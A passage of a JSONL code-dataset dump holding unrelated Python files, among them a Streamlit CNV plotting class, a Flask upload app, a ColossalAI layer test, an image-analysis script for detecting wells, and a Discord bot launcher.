st\nimport workflows.general.analysis as ann\nfrom missionbio.h5.constants import CHROM\nfrom missionbio.mosaic.constants import GENE_NAME\nfrom segment import track\n\n\nclass Render:\n \"\"\"\n The function of this class to read the arguments\n from the Argument class and create an appropriate\n GUI for them. 
It must also provide feedback to the\n Compute class as to whether the step is to be\n processed or not.\n \"\"\"\n\n def __init__(self, arguments):\n self.arguments = arguments\n\n def preprocess(self):\n args = self.arguments\n with st.sidebar.expander(\"Preprocessing\"):\n interface.info(f\"{len(args.ids)} features available\")\n\n form = st.form(\"Preprocessing form\")\n args.min_cells = form.slider(\"Minimum cells with amplicon (%)\", min_value=0, max_value=100, value=int(args.get(\"min_cells\")))\n\n args.drop_genes = form.multiselect(\"Genes to drop\", args.all_genes)\n args.keep_genes = form.multiselect(\"Genes to keep\", args.all_genes)\n\n clicked = form.form_submit_button(\"Process\")\n\n if args.keep_genes and args.drop_genes:\n interface.error(\"Only one of keep or drop genes can be selected.\")\n\n return clicked\n\n def prepare(self):\n args = self.arguments\n assay = ann.data.sample.cnv\n\n with st.sidebar.expander(\"Data preparation\", expanded=True):\n info = st.empty()\n\n LABELS = ann.data.available_labels(args.DNA_LABEL)\n args.ploidy_assay = st.selectbox(\"Reference assay\", LABELS)\n\n clones = ann.data.get_labels(assay, args.ploidy_assay)\n clones = list(set(clones))\n\n form = st.form(\"Data Preparation form\")\n args.diploid_cells = form.selectbox(\"Diploid cells\", clones)\n\n clicked = form.form_submit_button(\"Prepare\")\n\n interface.info(f\"Ploidy calculation is performed by normalizing against cluster {args.diploid_cells} of {args.ploidy_assay}.\", info)\n\n return clicked\n\n def layout(self):\n\n args = self.arguments\n\n VISUALS = [[1, 1, 4], [args.HEATMAP, args.LINEPLOT]]\n\n kind = args.visual_type\n options = VISUALS[1]\n column_sizes = VISUALS[0]\n\n columns = st.columns(column_sizes)\n for i in range(len(options)):\n with columns[i]:\n clicked = st.button(options[i], key=f\"visual-{options[i]}\")\n if clicked:\n kind = options[i]\n track(f\"Plot {kind} clicked\")\n args.visual_type = kind\n\n columns = st.columns([0.75, 0.1, 2])\n with columns[0]:\n st.caption(\"---\")\n\n args.args_container = columns[0]\n args.plot_container = columns[2]\n\n def visual_arguments(self):\n\n args = self.arguments\n assay = ann.data.sample.cnv\n\n SPLITBY = ann.data.available_labels(args.ploidy_assay) + args.SPLITBY\n\n kind = args.visual_type\n\n with args.args_container:\n if kind == args.HEATMAP:\n args.fig_attribute = st.selectbox(\"Attribute\", args.LAYERS, key=\"Visualization Attribute\")\n args.splitby = st.selectbox(\"Group by on Y-axis\", SPLITBY)\n args.fig_features = st.selectbox(\"Choose X-axis\", args.FEATURES, key=\"Visualization features\")\n\n if args.fig_features == args.POSITIONS:\n subfeats = sorted(list(set(assay.col_attrs[CHROM])))\n elif args.fig_features == args.GENES:\n subfeats = sorted(list(set(assay.col_attrs[GENE_NAME])))\n\n args.select_features = st.multiselect(\"Filter X-axis data\", subfeats, key=\"Visualization subfeatures\")\n args.cluster_heatmap = st.checkbox(\"Cluster within labels\", True)\n args.convolve = st.slider(\"Smoothing\", 0, 100)\n\n elif kind == args.LINEPLOT:\n clones = ann.data.get_labels(assay, args.get(\"ploidy_assay\"))\n clones = list(set(clones))\n args.clone = st.selectbox(\"Clone\", clones)\n args.collapse = st.checkbox(\"Collapse to gene\", False)\n\n def visual(self):\n\n args = self.arguments\n\n with args.plot_container:\n\n if args.fig is not None:\n args.fig.update_layout(plot_bgcolor=\"rgba(0,0,0,0)\")\n 
st.plotly_chart(args.fig)\n","sub_path":"src/insights/workflows/cnv/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"463641101","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"andrej\"\n__date__ = \"$Jun 8, 2015 9:49:09 PM$\"\n\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))\n\nfrom werkzeug import secure_filename\nfrom flask import Flask, request, redirect, url_for\nfrom flask import render_template\n\nimport global_config\nfrom shared.cache import DefaultCache\nfrom data.source.nhlreference_source import NHLRefDataSource\nfrom api.webapi import webapi\nfrom api.admin import webapi_admin\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nh = logging.StreamHandler()\nh.setLevel(logging.INFO)\n\nl = logging.getLogger()\nl.setLevel(logging.INFO)\nl.addHandler(h)\n\napp = Flask(__name__)\napp.config.from_object('nhlpredictor.webapp.config.DevelopmentConfig')\napp.logger.addHandler(h)\n\napp.register_blueprint(webapi)\napp.register_blueprint(webapi_admin)\n\nALLOWED_EXTENSIONS = set(['csv'])\n\ndata_source = NHLRefDataSource(dict(sub_data_url=global_config.MINER['sub_data_url'],\n base_url=global_config.MINER['base_url']),\n cache=DefaultCache.get_instance())\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n@app.route('/predictfile', methods=['GET', 'POST'])\n@app.route('/predictfile/', methods=['GET', 'POST'])\ndef predictfile():\n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('uploaded_file', filename=filename))\n return render_template('uploadcsv.html')\n","sub_path":"nhlpredictor/webapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"170975999","text":"from contextlib import nullcontext\n\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nfrom torch.testing import assert_close\n\nimport colossalai\nfrom colossalai.lazy import LazyInitContext\nfrom colossalai.shardformer.layer import GPT2FusedLinearConv1D_Col, GPT2FusedLinearConv1D_Row\nfrom colossalai.shardformer.layer.qkv_fused_linear import split_fused_qkv_in_gpt2_style\nfrom colossalai.testing import parameterize, rerun_if_address_is_in_use, spawn\n\n\n# This code is copied from https://github.com/huggingface/transformers\nclass Conv1D(nn.Module):\n \"\"\"\n 1D-convolutional layer as defined by Radford et al. 
for OpenAI GPT (and also used in GPT-2).\n\n Basically works like a linear layer but the weights are transposed.\n\n Args:\n nf (`int`): The number of output features.\n nx (`int`): The number of input features.\n \"\"\"\n\n def __init__(self, nf, nx):\n super().__init__()\n self.nf = nf\n self.weight = nn.Parameter(torch.empty(nx, nf))\n self.bias = nn.Parameter(torch.zeros(nf))\n nn.init.normal_(self.weight, std=0.02)\n\n def forward(self, x):\n size_out = x.size()[:-1] + (self.nf,)\n x = torch.addmm(self.bias, x.view(-1, x.size(-1)), self.weight)\n x = x.view(size_out)\n return x\n\n\ndef rearrange(tensor: torch.Tensor, dim: int):\n tensor = tensor.clone()\n world_size = 2\n order = torch.arange(world_size * 3)\n new_order = []\n for i in range(world_size):\n new_order.append(order[i::world_size])\n new_order = torch.cat(new_order)\n\n tensor_chunks = torch.chunk(tensor, world_size * 3, dim=dim)\n rearanged_tensor_chunks = [tensor_chunks[i] for i in new_order]\n rearanged_tensor = torch.cat(rearanged_tensor_chunks, dim=dim)\n return rearanged_tensor\n\n\n@parameterize('lazy_init', [False, True])\ndef check_linear_conv_1d_col(lazy_init: bool):\n ctx = LazyInitContext() if lazy_init else nullcontext()\n linear = Conv1D(192, 48).cuda()\n with ctx:\n linear_copy = Conv1D(192, 48).cuda()\n linear_conv_col = GPT2FusedLinearConv1D_Col.from_native_module(linear_copy,\n process_group=None,\n gather_output=True,\n n_fused=3)\n\n assert linear.weight.shape == torch.Size([48, 192])\n assert linear.bias.shape == torch.Size([192])\n assert linear_conv_col.weight.shape == torch.Size([48, 96])\n assert linear_conv_col.bias.shape == torch.Size([96])\n assert linear_copy.weight is linear_conv_col.weight\n assert linear_copy.bias is linear_conv_col.bias\n\n # ensure weights are reversibly loadable\n linear_conv_col.load_state_dict(linear.state_dict())\n linear.load_state_dict(linear_conv_col.state_dict())\n\n # check computation correctness\n x = torch.rand(4, 48).cuda()\n out = linear(x)\n gather_out = linear_conv_col(x)\n assert_close(rearrange(out, 1), gather_out)\n\n # check backward correctness\n out.sum().backward()\n gather_out.sum().backward()\n\n target_grad = split_fused_qkv_in_gpt2_style(linear.weight.grad, 3, None, True)\n assert_close(target_grad, linear_conv_col.weight.grad)\n\n\n@parameterize('lazy_init', [False, True])\ndef check_linear_conv_1d_row(lazy_init: bool):\n ctx = LazyInitContext() if lazy_init else nullcontext()\n\n linear = Conv1D(192, 48).cuda()\n with ctx:\n linear_copy = Conv1D(192, 48).cuda()\n linear_row = GPT2FusedLinearConv1D_Row.from_native_module(linear_copy, process_group=None, parallel_input=False)\n\n assert linear.weight.shape == torch.Size([48, 192])\n assert linear_row.weight.shape == torch.Size([24, 192])\n assert linear_row.bias.shape == torch.Size([192])\n assert linear_copy.weight is linear_row.weight\n assert linear_copy.bias is linear_row.bias\n\n # ensure weights are reversibly loadable\n linear_row.load_state_dict(linear.state_dict())\n linear.load_state_dict(linear_row.state_dict())\n\n # check computation correctness\n x = torch.rand(4, 48).cuda()\n out = linear(x)\n gather_out = linear_row(x)\n assert_close(out, gather_out)\n\n # check backward correctness\n out.sum().backward()\n gather_out.sum().backward()\n\n rank = dist.get_rank()\n target_grad = torch.chunk(linear.weight.grad, 2, dim=0)[rank]\n assert_close(target_grad, linear_row.weight.grad)\n\n\ndef run_dist(rank, world_size, port):\n colossalai.launch(config={}, rank=rank, 
world_size=world_size, host='localhost', port=port, backend='nccl')\n\n # test for linear conv\n check_linear_conv_1d_col()\n check_linear_conv_1d_row()\n\n\n@rerun_if_address_is_in_use()\ndef test_linearconv():\n spawn(run_dist, nprocs=2)\n\n\nif __name__ == '__main__':\n test_linearconv()\n","sub_path":"tests/test_shardformer/test_layer/test_qkv_fused_linear_1d.py","file_name":"test_qkv_fused_linear_1d.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"645089695","text":"\ndef sum_digit(number):\n return sum([int(i) for i in str(number)])\n\n\ndef main():\n max_sum = 0\n for a in range(1, 100):\n for b in range(1, 100):\n _sum = sum_digit(a**b)\n\n if _sum > max_sum:\n max_sum = _sum\n return max_sum\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"python35/solutions/Problem056.py","file_name":"Problem056.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"350291710","text":"from pyramid import testing\nfrom webob.multidict import MultiDict\nfrom sqlalchemy import func\n\nfrom . import BaseTest\nfrom beerio2.models import User, Product, PurchaseProduct, PurchaseProduct\n\nclass TestBasicDatabaseInvariants(BaseTest):\n\n def test_users(self):\n active_users = self.session.query(User).filter(User.active).count()\n inactive_users = self.session.query(User).filter(~User.active).count()\n\n assert active_users <= 15\n assert inactive_users > 0\n\n def test_money(self):\n for user in self.session.query(User).all():\n balance_receipts = sum([r.amount_balance for r in user.receipts])\n sell_prices = sum([s.price for s in user.sells])\n guarantee_receipts = sum([r.amount_guarantee for r in user.receipts])\n\n assert user.balance == balance_receipts - sell_prices\n assert user.guarantee == guarantee_receipts \n\n def test_products(self):\n products = self.session.query(Product).all()\n assert len(products) == 8\n\n def test_purchases(self):\n total_bottles, total_crates = self.session.query(\n func.sum(PurchaseProduct.num_bottles),\n func.sum(PurchaseProduct.num_crates),\n ).one()\n assert total_bottles == 44\n assert total_crates == 6\n\n def test_form_fail(self):\n from ..views.default import my_view\n request = testing.DummyRequest(dbsession=self.session, post=MultiDict())\n info = my_view(request)\n assert not info['form'].validate()\n\n def test_form_okay(self):\n from ..views.default import my_view\n request = testing.DummyRequest(\n dbsession=self.session,\n post=MultiDict([\n ('name', 'Asdf'),\n ('company', ''),\n ('volume_ml', '500'),\n ]),\n )\n form = my_view(request)['form']\n assert form.validate(), form.errors\n assert form.data['volume_ml'] == 500\n","sub_path":"beerio2/tests/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"431317040","text":"\"\"\"\nPython Assignment\nDate : 2018-06-23\nAuthor : Hyunwook Kim\n\nProblem 9. 
Multiple Total Score\nCompute the total score for the entered scores.\n\"\"\"\n\n\nscore_str = input(\"Score: \").split(', ')\nscore_sum = 0\nfor i in range(len(score_str)):\n    score_sum += int(score_str[i])\n\nprint(\"Total Score:\", score_sum)\n","sub_path":"chapter00/python_files/pyas09.py","file_name":"pyas09.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"447056773","text":"\n\nfrom xai.brain.wordbase.nouns._wake import _WAKE\n\n# class header\nclass _WAKED(_WAKE, ):\n\tdef __init__(self,): \n\t\t_WAKE.__init__(self)\n\t\tself.name = \"WAKED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"wake\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_waked.py","file_name":"_waked.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"222158542","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 25 19:34:53 2018\r\n\r\n@author: Liz\r\n\"\"\"\r\n#--ADD TO THE ORIGINAL CODE--\r\nfrom skimage.feature import peak_local_max,canny\r\nfrom skimage.feature import match_template\r\nfrom skimage.io import imread\r\nfrom skimage.color import rgb2gray\r\n\r\n#from skimage.transform import resize\r\nfrom skimage.filters.thresholding import threshold_otsu\r\nfrom skimage.exposure import rescale_intensity\r\n \r\n # In[]\r\nplt.close('all')\r\ngen = 'Imagenes/'\r\nfolder_ids = os.listdir(gen)\r\n# IDs of the images\r\nimage_ids = list()\r\n\r\n#t_name = 'template1'# name of the template to use\r\nr = 50 # reference radius\r\nr_pozo = 110 # well radius\r\ntemplate = circle(r)\r\n\r\n# Creation of a matrix holding all the ids, with one folder per row.\r\nfor i in range(0,len(folder_ids)):\r\n    image_ids.insert(i, os.listdir(gen + folder_ids[i] + '/') )    \r\n#for i in range(0,len(folder_ids)):\r\ni = 2# folder number\r\nfor j in range(0,len(image_ids[i][:])):\r\n    PATH = gen + folder_ids[i] + '/' + image_ids[i][j]\r\n    I = imread(PATH)\r\n    I_gray = rgb2gray(I)\r\n    I_edges = canny(I_gray,sigma=0.05)\r\n    coord = corr2d(I_edges,template,folder_ids[i],image_ids[i][j],j,r_pozo)\r\n    I_gray = rescale_intensity(I_gray,in_range=(0.1,0.8))\r\n    m = np.shape(I_gray)\r\n    I_final = np.ones([m[0],m[1]])\r\n    for k in range(0,len(coord)):\r\n#        k = 0\r\n        I_crop = pozos(I_gray,coord[k],r_pozo)\r\n        I_otsu = otsu(I_crop,coord[k],r_pozo)\r\n        I_final = I_final * I_otsu\r\n    fig = plt.figure()\r\n    ax1 = fig.add_subplot(111)\r\n    ax1.axis('off')\r\n    ax1.imshow(I_final,cmap='gray')\r\n    fig.savefig('Resultados_otsu/' + folder_ids[i] + '/' + image_ids[i][j])\r\n#for i in [3,5]:\r\n##i = 1# folder number\r\n#    for j in range(0,len(image_ids[i][:])):\r\n#        PATH = gen + folder_ids[i] + '/' + image_ids[i][j]\r\n#    #    offset = 150\r\n#        I = imread(PATH)\r\n#        I_gray = rgb2gray(I)\r\n#        coord = corr2d(I_gray,t_name,folder_ids[i],image_ids[i][j],j)\r\n\r\n#template = imread(t_name + '.png')\r\n#template_g = rgb2gray(template)    \r\n \r\n#PATH = gen + folder_ids[0] + '/' + image_ids[0][7]\r\n#I = imread(PATH)\r\n#I_gray = rgb2gray(I)\r\n#print(np.mean(I_gray[:]))\r\n#I_gray = I_gray - np.mean(I_gray)\r\n# In[]\r\nPATH = gen + folder_ids[1] + '/' + image_ids[1][0]\r\nI = imread(PATH)\r\nI_gray = rgb2gray(I) \r\nI_edges = canny(I_gray,sigma=0.05)\r\ncoord = corr2d(I_edges,template,folder_ids[1],image_ids[1][0],0,r_pozo)\r\nI_gray = rescale_intensity(I_gray,in_range=(0.2,0.8))\r\nm = np.shape(I_gray)\r\nI_final = np.ones([m[0],m[1]])\r\nfor k in range(0,len(coord)):\r\n    I_crop = pozos(I_gray,coord[k],r_pozo)\r\n    I_otsu = otsu(I_crop,coord[k],r_pozo)\r\n    I_final = I_final * I_otsu\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(111)\r\nax1.axis('off')\r\nax1.imshow(I_final,cmap='gray')\r\n# In[] \r\ndef otsu(I_gray,centro,r):\r\n    I = I_gray[(centro[1]-r):(centro[1]+r),(centro[0]-r):(centro[0]+r)]\r\n    prom = np.mean(I)\r\n    thresh = threshold_otsu(I)*prom\r\n    BW = I_gray > thresh\r\n    BW = 1 - BW\r\n    return BW 
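\r\n# Note (reading of the code above): the Otsu threshold is computed on the cropped\r\n# well (I) and scaled by the crop's mean intensity (prom), then applied to the whole\r\n# input image; inverting with 1 - BW makes the darker, at-or-below-threshold pixels\r\n# the foreground (value 1).\r\n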
\r\n    \r\n# In[] Normalized cross-correlation from skimage\r\n#template = imread('template_re2.png')\r\n#template_g = rgb2gray(template)\r\n#template_g = template_g - np.mean(template_g)\r\n#result = match_template(I_gray,template_g,pad_input = True)\r\n### local maxima of the cross-correlation to find other matches\r\n#coordinates = peak_local_max(result, min_distance=125)\r\n##\r\n#fig, (ax_orig, ax_template, ax_corr) = plt.subplots(1, 3)\r\n#ax_orig.imshow(I_gray, cmap='gray')\r\n#ax_orig.set_title('Original')\r\n#ax_orig.set_axis_off()\r\n#ax_template.imshow(template_g, cmap='gray')\r\n#ax_template.set_title('Template')\r\n#ax_template.set_axis_off()\r\n#ax_corr.imshow(result, cmap='gray')\r\n#ax_corr.set_title('Cross-correlation')\r\n#ax_corr.set_axis_off()\r\n#for i in range(0,len(coordinates)):\r\n#    ax_orig.plot(coordinates[i,1], coordinates[i,0], 'ro')\r\n#fig.show()\r\n    \r\n    \r\n#--Input: grayscale image I_gray and a template to perform the\r\n#@@ -86,46 +93,46 @@\r\n    # Saves the images produced by the template used, at the\r\n    # path Resultados_template/nombre_folder/nombre_imagen\r\n    \r\n#def corr2d(I_gray,t_name,folder,name,ind):\r\n#    template = imread(t_name + '.png')\r\n#    template_g = rgb2gray(template)\r\ndef corr2d(BW,template,folder,name,ind,r_pozo):\r\n    result = match_template(I_edges,template,pad_input = True)\r\n    coordinates = peak_local_max(result, min_distance=160)# center of the small \r\n    if coordinates[0][1] < coordinates[1][1]:\r\n        y = coordinates[0][0]-r_pozo\r\n        x = coordinates[0][1]+r_pozo\r\n    else:\r\n        y = coordinates[1][0]-r_pozo\r\n        x = coordinates[1][1]+r_pozo\r\n    # coordinates of the other wells by symmetry\r\n    centros = [[x,y],[x,y+2*r_pozo]]\r\n    for i in range(0,2):\r\n        centros.append([centros[i][0] + 2*r_pozo,centros[i][1] ])\r\n        centros.append([centros[i][0] - 2*r_pozo,centros[i][1] ])\r\n\r\n    centros = sorted(centros)\r\n#    fig, (ax_orig, ax_template, ax_corr) = plt.subplots(1, 3)\r\n#    fig = plt.figure()\r\n#    ax_orig = fig.add_subplot(111)\r\n##    ax_orig.imshow(I_gray, cmap='gray')\r\n#    ax_orig.imshow(BW, cmap='gray')\r\n#    ax_orig.set_title('Original')\r\n#    ax_orig.set_axis_off()\r\n##    ax_template.imshow(template, cmap='gray')\r\n##    ax_template.set_title('Template')\r\n##    ax_template.set_axis_off()\r\n##    ax_corr.imshow(result, cmap='gray')\r\n##    ax_corr.set_title('Cross-correlation')\r\n##    ax_corr.set_axis_off()\r\n##    for i in range(0,len(coordinates)):\r\n##        ax_orig.plot(coordinates[i,1], coordinates[i,0], 'ro')\r\n#    for i in range(0,len(centros)):\r\n#        ax_orig.plot(centros[i][0],centros[i][1],'ro')\r\n#    fig.show()    \r\n#    fig.savefig('Resultados_template/' + folder + '/' + name)\r\n#    fig.savefig('Resultados_template/' + t_name + '/' + folder + '/' + name)\r\n    return centros\r\n    \r\n#coord = corr2d(edges,template,folder_ids[0],image_ids[0][7],7)\r\n# In[] Sectioning by Euclidean distance\r\n#I_gray = rgb2gray(I)\r\n#I_new = np.zeros([636,944])\r\n#proms = list()\r\n#r = 130\r\n#for k in range(0,6):\r\n#    centro = coordinates[k][:]\r\n#    for i in range(0,635):\r\n#        for j in range(0,943):\r\n#            d = np.sqrt( abs( (centro[0] - i)**2 + (centro[1] - j)**2 ) ) \r\n#            if d <= r:\r\n#                I_new[i,j] = I_gray[i,j]\r\n#    \r\n#fig = plt.figure()\r\n#ax1 = fig.add_subplot(111)\r\n#ax1.axis('off')\r\n#ax1.imshow(I_new,cmap='gray')\r\n    \r\n    #-Inputs: grayscale image I_gray, coordinates of the centers\r\n    # (coordinates), the smallest dimensions dim as a list of 2, and the radius.\r\n#@@ -134,44 +141,66 @@ \r\n#def corr2d(I_gray,t_name,folder,name,ind):\r\n#    def pozos(I_gray,coordinates,r):\r\ndef pozos(I_gray,centro,r):\r\n    h,w = I_gray.shape\r\n    I_new = np.zeros([h,w])\r\n#    for k in range(0,len(coordinates)):\r\n#        centro = coordinates[k][:]\r\n    for i in range(0,h):\r\n        for j in range(0,w):\r\n            d = np.sqrt( abs( (centro[1] - i)**2 + (centro[0] - j)**2 ) ) \r\n            if d <= r:\r\n                I_new[i,j] = I_gray[i,j]\r\n#    r = 130\r\n#    for i in range(0,h):\r\n#        for j in range(0,w):\r\n#            x = centro[1] - i\r\n#            y = centro[0] - j\r\n#            d = np.sqrt(abs( np.square(x) + np.square(y) ))\r\n#            if any(d <= r):\r\n#                I_new[i,j] = I_gray[i,j]\r\n#    fig = plt.figure()\r\n#    ax1 = fig.add_subplot(111)\r\n#    ax1.axis('off')\r\n#    ax1.imshow(I_new,cmap='gray')\r\n    return I_new\r\n\r\n#h,w = I_gray.shape\r\n#I_new = np.zeros([h,w])\r\n#r = 130\r\n#for i in range(0,h):\r\n#    for j in range(0,w):\r\n#        x = coord[:,0] - i\r\n#        y = coord[:,1] - j\r\n#        d = np.sqrt(abs( np.square(x) + np.square(y) ))\r\n#        if any(d <= r):\r\n#            I_new[i,j] = I_gray[i,j]\r\n    \r\n    \r\n#list comprehension\r\n\r\n#>>> [(x, y) for x in [1,2,3] for y in [3,1,4] if x != y]\r\n\r\n#d = np.sqrt(abs(centro-dim))\r\n#I_gray = resize(I_gray,dim)\r\n#I_new = pozos(I_gray,coord,r)\r\n\r\n\r\n# In[] Ensemble averaging\r\n# Minimum dimension of the images (FIX)\r\nmin_h = 606\r\nmin_w = 914\r\n\r\nI_ensamble = np.zeros([606,914])\r\n#for i in range(0,len(folder_ids)):\r\nfor j in range(0,len(image_ids[1][:])):\r\n    PATH = gen + folder_ids[1] + '/' + image_ids[1][j]\r\n    I = imread(PATH)\r\n    I_gray = rgb2gray(I)\r\n    I_gray = resize(I_gray,(min_h,min_w)) \r\n    I_ensamble = I_ensamble + I_gray\r\n    \r\nI_ensamble = I_ensamble/28\r\nI_new = pozos(I_gray,coord,r)\r\n    \r\nfig = plt.figure()\r\nax1 = fig.add_subplot(111)\r\nax1.axis('off')\r\nax1.imshow(I_ensamble,cmap='gray')\r\nax1.imshow(I_new,cmap='gray')\r\n    \r\nprint(np.mean(I_ensamble[:]))\r\n    \r\nscipy.misc.imsave('Resultados/Promedio1.png' ,I_ensamble)\r\n# In[]\r\n\r\n#r = 50\r\ndef circle(r):\r\n    dim = r*2 + 10\r\n    Nigerrimo = np.zeros([dim,dim])\r\n    centro = [dim/2,dim/2]\r\n    for i in range(0,dim):\r\n        for j in range(0,dim):\r\n            d = np.sqrt(abs( (centro[0] - i)**2 + (centro[1] - j)**2 ))\r\n            if d > r:\r\n                Nigerrimo[i,j] = 1\r\n    return Nigerrimo\r\n\r\n#c = circle(r)\r\n\r\n#fig = plt.figure()\r\n#ax = fig.add_subplot(111)\r\n#ax.axis('off')\r\n#ax.imshow(c,cmap='gray')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"256093488","text":"class Survey(object):\n    \"\"\"\n    Copyright (C) Sam Esla, 2016. MIT License. https://opensource.org/licenses/MIT\n    This is a preliminary model of the Survey hierarchy and its subordinate parts.\n    In order, they are: Survey>Pages>Questions>Options. This is what stores all\n    the survey information and questions and their positioning. I have simply left\n    out much of the irrelevant (for our purposes) parts of the objects. 
This may\n change.\n \"\"\"\n def __init__(self, survey_id, title, pages=[], questions=[]):\n self.id = survey_id\n self.title = title\n self.questions = questions\n self.pages = pages\n if pages is not None and len(pages) > 1:\n self.pages.sort(key=lambda page: page.position)\n if questions is not None and len(questions) > 1:\n self.questions.sort(key=lambda question: question.position)\n\n def add_page(self, page):\n self.pages.append(page)\n self.pages.sort(key=lambda page: page.position)\n\n def add_question(self, question):\n self.questions.append(question)\n self.questions.sort(key=lambda question: question.position)\n\n @staticmethod\n def consume_raw_api(survey_details):\n # make sure to have this json parsed before sending it here.\n try:\n survey = Survey(survey_details[\"id\"], survey_details[\"title\"], [], [])\n\n for raw_pg in survey_details[\"pages\"]:\n page = Page(raw_pg[\"id\"],\n raw_pg[\"position\"],\n [])\n for raw_que in raw_pg[\"questions\"]:\n question = Question(raw_que[\"id\"],\n raw_que[\"headings\"][0][\"heading\"],\n page.id,\n raw_que[\"position\"],\n [],\n raw_que[\"family\"])\n page.add_question(question)\n for raw_opt in raw_que[\"answers\"][\"choices\"]:\n option = Option(raw_opt[\"id\"],\n raw_opt[\"text\"],\n raw_opt[\"position\"])\n question.add_option(option)\n survey.add_page(page)\n\n for page in survey.pages:\n for question in page.questions:\n survey.questions.append(question)\n return survey\n except Exception as e:\n print(e)\n print(\"Failed to parse JSON Survey\")\n return None\n\n\nclass Page(object):\n def __init__(self, page_id, position, questions=[]):\n self.id = page_id\n self.position = position\n self.questions = questions\n if questions is not None and len(questions) > 1:\n self.questions.sort(key=lambda question: question.position)\n\n def add_question(self, question):\n self.questions.append(question)\n self.questions.sort(key=lambda question: question.position)\n\n\nclass Question(object):\n def __init__(self, question_id, heading, page_id, position, options=[], family=\"single-choice\"):\n self.id = question_id\n self.heading = heading\n self.page_id = page_id\n self.options = options\n self.type = family\n self.position = position\n if options is not None and len(options) > 1:\n self.options.sort(key=lambda option: option.position)\n\n def add_option(self, option):\n self.options.append(option)\n self.options.sort(key=lambda option: option.position)\n\n\nclass Option(object):\n def __init__(self, option_id, text, position):\n self.text = text\n self.id = option_id\n self.position = position\n self.selected = False","sub_path":"survey_model.py","file_name":"survey_model.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"108429905","text":"import random\nimport asyncio\nimport aiohttp\nimport json\nfrom discord import Game, Embed\nfrom discord.ext.commands import Bot\nimport os\n\ndescription_play = ''\n\nBOT_PREFIX = (\"!\")\nwith open('TOKEN.txt', 'r') as f:\n TOKEN = f.readline()\n\nclient = Bot(command_prefix=BOT_PREFIX)\nplayer, voice = None, None\n\n\n@client.event\nasync def on_ready():\n await client.change_presence(game=Game(name=\"PUBG MOBILE\"))\n print(\"Logged in as \" + client.user.name)\n\n\nasync def list_servers():\n await client.wait_until_ready()\n while not client.is_closed:\n print(\"Current servers:\")\n for server in client.servers:\n print(server.name)\n await asyncio.sleep(600)\n\nif __name__ == '__main__':\n 
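# Each name below must be an importable module that defines a setup()\n    # function; discord.py calls it when load_extension() runs.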
for extension in 'CatOrDog', 'Sounds', 'LevelingSystem':\n client.load_extension(extension)\n client.loop.create_task(list_servers())\n client.run(TOKEN)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"368472007","text":"import mp.states as states\nimport gin\n\n\n@gin.configurable\nclass MPPGStateMachine(states.StateMachine):\n def build(self):\n self.goto_init_pose = states.GoToInitPoseState(self.env)\n self.align_object = states.AlignObjectSequenceState(self.env)\n self.planned_grasp = states.PlannedGraspState(self.env)\n self.move_to_goal = states.MoveToGoalState(self.env)\n self.wait = states.WaitState(\n self.env, 30 if self.env.simulation else 1000)\n self.failure = states.FailureState(self.env)\n\n # define transitions between states\n self.goto_init_pose.connect(next_state=self.align_object,\n failure_state=self.failure)\n self.align_object.connect(next_state=self.planned_grasp,\n failure_state=self.failure)\n self.planned_grasp.connect(next_state=self.move_to_goal,\n failure_state=self.align_object)\n self.move_to_goal.connect(next_state=None, failure_state=self.wait)\n self.wait.connect(next_state=self.goto_init_pose,\n failure_state=self.failure)\n\n # return initial state\n return self.goto_init_pose\n","sub_path":"python/residual_learning/state_machines.py","file_name":"state_machines.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139877987","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2015 be-cloud.be\n# Jerome Sonnet \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# 